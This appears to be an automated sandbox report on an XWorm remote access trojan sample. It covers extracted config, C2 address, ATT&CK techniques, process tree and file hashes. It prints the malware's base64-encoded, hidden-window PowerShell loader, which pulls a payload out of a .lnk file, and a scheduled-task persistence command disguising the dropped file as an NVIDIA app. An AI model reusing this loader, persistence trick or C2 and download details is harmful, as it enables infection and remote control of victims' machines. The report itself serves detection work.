xworm | hxxps://gofile[.]io/d/0hxASt

Resubmissions

05/03/2025, 16:37

250305-t5an3stjx4 10

05/03/2025, 16:32

250305-t174sasxfz 10

05/03/2025, 16:30

250305-tzwpcssry5 10

Analysis

max time kernel
195s
max time network
193s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
05/03/2025, 16:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/0hxASt

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

181.214.214.6:30120

Mutex

z5dRlxK0ktwBzYfm

Attributes

Install_directory
%ProgramData%
install_file
NVIDIA app.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000300000001e6f1-203.dat	family_xworm
behavioral1/memory/3244-210-0x0000000000960000-0x0000000000970000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2524	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation	2v1.exe

Executes dropped EXE 2 IoCs

pid	Process
3244	2v1.exe
2024	NVIDIA app.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings	powershell.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
4140	NOTEPAD.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4652	schtasks.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
6128	msedge.exe
6128	msedge.exe
3384	msedge.exe
3384	msedge.exe
548	identity_helper.exe
548	identity_helper.exe
3016	msedge.exe
3016	msedge.exe
888	msedge.exe
888	msedge.exe
888	msedge.exe
888	msedge.exe
2524	powershell.exe
2524	powershell.exe
2524	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeRestorePrivilege	3964	7zG.exe
Token: 35	3964	7zG.exe
Token: SeSecurityPrivilege	3964	7zG.exe
Token: SeSecurityPrivilege	3964	7zG.exe
Token: SeDebugPrivilege	2524	powershell.exe
Token: SeDebugPrivilege	3244	2v1.exe
Token: SeDebugPrivilege	3244	2v1.exe
Token: SeDebugPrivilege	2024	NVIDIA app.exe

Suspicious use of FindShellTrayWindow 42 IoCs

pid	Process
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3964	7zG.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe
3384	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3384 wrote to memory of 5528	3384	msedge.exe	89
PID 3384 wrote to memory of 5528	3384	msedge.exe	89
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 768	3384	msedge.exe	90
PID 3384 wrote to memory of 6128	3384	msedge.exe	91
PID 3384 wrote to memory of 6128	3384	msedge.exe	91
PID 3384 wrote to memory of 4764	3384	msedge.exe	92
PID 3384 wrote to memory of 4764	3384	msedge.exe	92
PID 3384 wrote to memory of 4764	3384	msedge.exe	92
PID 3384 wrote to memory of 4764	3384	msedge.exe	92
PID 3384 wrote to memory of 4764	3384	msedge.exe	92
PID 3384 wrote to memory of 4764	3384	msedge.exe	92
PID 3384 wrote to memory of 4764	3384	msedge.exe	92
PID 3384 wrote to memory of 4764	3384	msedge.exe	92
PID 3384 wrote to memory of 4764	3384	msedge.exe	92
PID 3384 wrote to memory of 4764	3384	msedge.exe	92
PID 3384 wrote to memory of 4764	3384	msedge.exe	92
PID 3384 wrote to memory of 4764	3384	msedge.exe	92
PID 3384 wrote to memory of 4764	3384	msedge.exe	92
PID 3384 wrote to memory of 4764	3384	msedge.exe	92
PID 3384 wrote to memory of 4764	3384	msedge.exe	92
PID 3384 wrote to memory of 4764	3384	msedge.exe	92
PID 3384 wrote to memory of 4764	3384	msedge.exe	92
PID 3384 wrote to memory of 4764	3384	msedge.exe	92
PID 3384 wrote to memory of 4764	3384	msedge.exe	92
PID 3384 wrote to memory of 4764	3384	msedge.exe	92

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/0hxASt
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffbcf6f46f8,0x7ffbcf6f4708,0x7ffbcf6f4718
  2⤵
  PID:5528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,15678330983183865939,3058238060379798637,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
  2⤵
  PID:768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,15678330983183865939,3058238060379798637,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,15678330983183865939,3058238060379798637,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2280 /prefetch:8
  2⤵
  PID:4764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,15678330983183865939,3058238060379798637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
  2⤵
  PID:2292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,15678330983183865939,3058238060379798637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
  2⤵
  PID:3532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,15678330983183865939,3058238060379798637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1
  2⤵
  PID:4656
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,15678330983183865939,3058238060379798637,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3880 /prefetch:8
  2⤵
  PID:1516
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,15678330983183865939,3058238060379798637,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3880 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,15678330983183865939,3058238060379798637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:1
  2⤵
  PID:4848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2068,15678330983183865939,3058238060379798637,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5544 /prefetch:8
  2⤵
  PID:1212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,15678330983183865939,3058238060379798637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
  2⤵
  PID:2480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,15678330983183865939,3058238060379798637,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5740 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,15678330983183865939,3058238060379798637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:1
  2⤵
  PID:5324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,15678330983183865939,3058238060379798637,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
  2⤵
  PID:4724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,15678330983183865939,3058238060379798637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:1
  2⤵
  PID:4988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,15678330983183865939,3058238060379798637,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
  2⤵
  PID:1596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,15678330983183865939,3058238060379798637,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4836 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:888

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2928

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2464

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4692

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\crashfiveguard (2)\" -spe -an -ai#7zMap22573:98:7zEvent27014
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3964

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\New Text Document.txt
1⤵
PID:116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -noe -WindowStyle hidden -e JABzAGMAcgBpAHAAdABfAHMAdABhAHIAdABfAGIAeQB0AGUAIAA9ACAAMAB4ADAAMAAwADEAOQBlAGYANgAKACQAcwBjAHIAaQBwAHQAXwBsAGUAbgBnAHQAaAAgAD0AIAAyADcAOAA4ADsACgAkAGYAaQBsAGUAbgBhAG0AZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAKgAuAGwAbgBrACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAANQAxADIAMAAwAH0AIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAATgBhAG0AZQA7AAoACgBpAGYAIAAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAZgBpAGwAZQBuAGEAbQBlACkAKQAKAHsACgAkAHYAYQBsACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAuAC8AIAAtAEYAaQBsAHQAZQByACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAFIAZQBjAHUAcgBzAGUAOwAKAGkAZgAgACgALQBuAG8AdAAgACQAdgBhAGwAKQAKAHsACgBlAHgAaQB0AAoAfQAKAFsASQBPAC4ARABpAHIAZQBjAHQAbwByAHkAXQA6ADoAUwBlAHQAQwB1AHIAcgBlAG4AdABEAGkAcgBlAGMAdABvAHIAeQAoACQAdgBhAGwALgBEAGkAcgBlAGMAdABvAHIAeQBOAGEAbQBlACkAOwAKAH0ACgAkAGYAaQBsAGUAcwB0AHIAZQBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEYAaQBsAGUAUwB0AHIAZQBhAG0AIAAkAGYAaQBsAGUAbgBhAG0AZQAsACcATwBwAGUAbgAnACwAJwBSAGUAYQBkACcALAAnAFIAZQBhAGQAVwByAGkAdABlACcAOwAKACQAdgBhAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACgAJABzAGMAcgBpAHAAdABfAGwAZQBuAGcAdABoACkAOwAKACQAcgAgAD0AIAAkAGYAaQBsAGUAcwB0AHIAZQBhAG0ALgBTAGUAZQBrACgAJABzAGMAcgBpAHAAdABfAHMAdABhAHIAdABfAGIAeQB0AGUALABbAEkATwAuAFMAZQBlAGsATwByAGkAZwBpAG4AXQA6ADoAQgBlAGcAaQBuACkAOwAKACQAcgAgAD0AIAAkAGYAaQBsAGUAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJAB2AGEAbAAsADAALAAkAHMAYwByAGkAcAB0AF8AbABlAG4AZwB0AGgAKQA7AAoAJAB2AGEAbAAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABDAGgAYQByAEEAcgByAGEAeQAoACQAdgBhAGwALAAwACwAJAB2AGEAbAAuAEwAZQBuAGcAdABoACkAOwAKACQAcwB0AHIAaQBuAGcAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB2AGEAbAApADsACgBpAGUAeAAgACQAcwB0AHIAaQBuAGcAOwA=
1⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2524
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\tesasd.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:4140
- C:\Users\Admin\AppData\Local\2v1.exe
  "C:\Users\Admin\AppData\Local\2v1.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3244
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "NVIDIA app" /tr "C:\ProgramData\NVIDIA app.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4652

C:\ProgramData\NVIDIA app.exe
"C:\ProgramData\NVIDIA app.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2024

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\2v1.exe

Filesize
39KB

MD5
4806c4d94f23b4aa628a7429255dde3e

SHA1
7588e35d34ed8184e34364faf72a3171b9a853ee

SHA256
38027f90b5fa2ddf926f00a1fc93e12e47dc76c0c55d4b75e28205eee31dc573

SHA512
45c16a1fc3985bab29910dc08cad2e10773ab8b59a776220c84698027c84be9a006a6ec311b3a3bcbb3e4c872664f317242783a602e06ef6032cdf9a14accdbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
fe6fb7ffeb0894d21284b11538e93bb4

SHA1
80c71bf18f3798129931b1781115bbef677f58f0

SHA256
e36c911b7dbea599da8ed437b46e86270ce5e0ac34af28ac343e22ecff991189

SHA512
3a8bd7b31352edd02202a7a8225973c10e3d10f924712bb3fffab3d8eea2d3d132f137518b5b5ad7ea1c03af20a7ab3ff96bd99ec460a16839330a5d2797753b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
1bed6483de34dd709e03fd3af839a76b

SHA1
3724a38c9e51fcce7955a59955d16bf68c083b92

SHA256
37a42554c291f46995b2487d08d80d94cefe6c7fb3cb4ae9c7c5e515d6b5e596

SHA512
264f6687ea8a8726b0000de1511b7b764b3d5a6f64946bb83a58effda42839e593de43865dafeeb89f5b78cc00d16f3979b417357fa2799ca0533bdf72f07fda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
144B

MD5
9dcc7f2dccf320f310b6e5559490213c

SHA1
d487fa9aff1ef000fbf1879fd51fc073070971c3

SHA256
b45ad877886694d7dcab326de83bcc9f07b421309522429fd93df8221f045844

SHA512
e336abcc7544ade082629b82d630e9263badad9e24b77f0d66c540248eeeea430fa5c179cde1b886959fb35452ab422209fd6a05c654d11f0c1427f8534d296e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
391B

MD5
2457be50ca5be33950315803b7ecdba7

SHA1
be05990d93a2c5ca87607929db70350fcc10774b

SHA256
2adbe9e90f38db9cf4280d3894086019c04cbb75f6a394265281fe60a767dfdd

SHA512
5c3fd0c059b674218b8745ae3cdb158b54bf7e9f21bfac0f3370c1019138eb649d5b3efb8ac7064b64d6a7a1e8f1d66aa60976ed992b413024e5d876e606bf41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
667b8db9b7138d935864cec29ca000cf

SHA1
360142b0982ae897eedc94bc552a3a70baf259fc

SHA256
6f2b2e2cadfb21b46b20e9d4e621f1207ed5b110cf302b07fcaa3599e14cbb7b

SHA512
69edf75cb8b64f6d61a51e2893ef1d76450373d9f498e27cfea1721aa512a05ef24d6e46aa99de242eb48de69b8152775a8ebac3ab383c27f92d3195c40cf12e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
20c9a8b652b11aee1c61852994227f10

SHA1
3c785286cda312fa6ecd24471f9dbe7446b88942

SHA256
9d177fbfdb4ecb56533e697c4bc3757e62ada348870d840954ee5dd643f109a7

SHA512
27dec4c8dfd64adcd318777027262dca1f3fac8865b199c595a261ed4bb74b0b8525d656726e3e0590c2e63041eba77616e40dbcc6d799d391a9784552d45b63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
fb8ffa6ae80bc49fa4723d6b60d211e8

SHA1
9a88bd405b489e2bd4d510087900cb4c7bf69400

SHA256
1ccf2550f7564248b43c5fab5e128ff78ecd741d623a7989ed34bd836f3c6ab2

SHA512
cb1d5def57fff4226c9b35e008b2a3c8d758741d265569dabd42c793f3e14c03c84a175c0b4857782260b984651bf77e8f699d04398f507932c901fd11e8dac7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

